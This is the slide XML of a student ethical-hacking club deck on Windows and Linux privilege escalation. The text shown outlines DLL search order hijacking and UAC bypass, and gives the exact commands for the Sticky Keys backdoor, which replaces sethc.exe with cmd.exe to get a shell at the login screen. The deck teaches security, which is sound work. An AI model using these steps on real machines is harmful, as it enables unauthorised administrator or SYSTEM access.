                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Performing search order DLL hijacking on a vulnerable program that has a higher privilege level, causing the attacker’s DLL to run at the same privilege level. This can be used to elevate privileges from user to administrator, or from administrator to SYSTEM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Covering the attack by loading the legitimate DLLS together with the malicious DLLs, so that systems appear to run as usual.</a:t>
            </a:r>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289978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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass User Account Control</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
            </a:b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500" dirty="0"/>
              <a:t>user account control (UAC) mechanism creates a distinction between regular users and administrators. , if UAC protection is not at the highest level, some Windows programs can escalate privileges, or execute COM objects with administrative privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372601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63250" y="95700"/>
            <a:ext cx="74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Windows Sticky Keys</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>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500" dirty="0"/>
              <a:t>Need physical access to the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Need to boot to a repair disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>In command window, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy c:\windows\system32\sethc.exe c:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Quit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, exit and restart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>At the login screen, if you click shirt key five times (sticky key prompt), then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> will show up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does it still work for Windows 10? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>Kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> yes, because sticky key is not a vulnerability, it is a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21519621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8114</TotalTime>
  <Words>2736</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>264</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Wingdings</vt:lpstr>
      <vt:lpstr>IBM Plex Sans</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Ethical Student Hackers</vt:lpstr>
      <vt:lpstr>The Legal Bit</vt:lpstr>
      <vt:lpstr>Code of Conduct</vt:lpstr>
      <vt:lpstr>Privilege Escalation</vt:lpstr>
      <vt:lpstr>Types of Privilege Escalation</vt:lpstr>
      <vt:lpstr>Windows - Access Token Manipulation </vt:lpstr>
      <vt:lpstr>Windows - DLL Search Order Hijacking </vt:lpstr>
      <vt:lpstr>Windows - Bypass User Account Control </vt:lpstr>
      <vt:lpstr>Windows Sticky Keys</vt:lpstr>
      <vt:lpstr>Windows Sticky Keys</vt:lpstr>
      <vt:lpstr>WinPEAS</vt:lpstr>
      <vt:lpstr>Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Linux Privilege Escalation</vt:lpstr>
      <vt:lpstr>Linux – Exploiting SUDO Rights</vt:lpstr>
      <vt:lpstr>LinPEAS</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>Privilege Escalation Using Aurora</vt:lpstr>
      <vt:lpstr>Privilege Escalation Using Aurora</vt:lpstr>
      <vt:lpstr>Linux - Kernel Exploit</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>Kernel Exploit using Exploit-DB</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>After gaining root access…</vt:lpstr>
      <vt:lpstr>Exploit Shellshock vulnerability</vt:lpstr>
      <vt:lpstr>Exploit Shellshock vulnerability</vt:lpstr>
      <vt:lpstr>Upcoming Sessions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Student Hackers</dc:title>
  <cp:lastModifiedBy>SoHyun Park</cp:lastModifiedBy>
  <cp:revision>70</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-23T00:15:19Z</dcterms:modified>
</cp:coreProperties>
</file>